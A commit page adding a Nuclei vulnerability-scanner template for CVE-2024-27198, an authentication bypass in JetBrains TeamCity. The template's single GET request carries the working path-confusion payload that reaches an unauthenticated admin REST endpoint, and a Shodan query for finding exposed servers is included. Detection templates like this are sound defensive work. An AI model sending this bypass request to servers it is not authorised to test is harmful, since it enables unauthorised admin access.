Merge pull request #9279 from projectdiscovery/CVE-2024-27198

Create CVE-2024-27198.yaml (TeamCity < 2023.11.4 - Authentication Bypass)
patch-1
Ritik Chaddha 2024-03-06 11:22:56 +05:30 committed by GitHub
commit 3c03962b65
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2024-27198
info:
name: TeamCity < 2023.11.4 - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
reference:
- https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2024-27198
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
shodan-query: http.component:"TeamCity"
tags: cve,cve2024,teamcity,jetbrains,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/xml")'
- 'contains_all(body, "buildNumber", "server version", "internalId")'
condition: and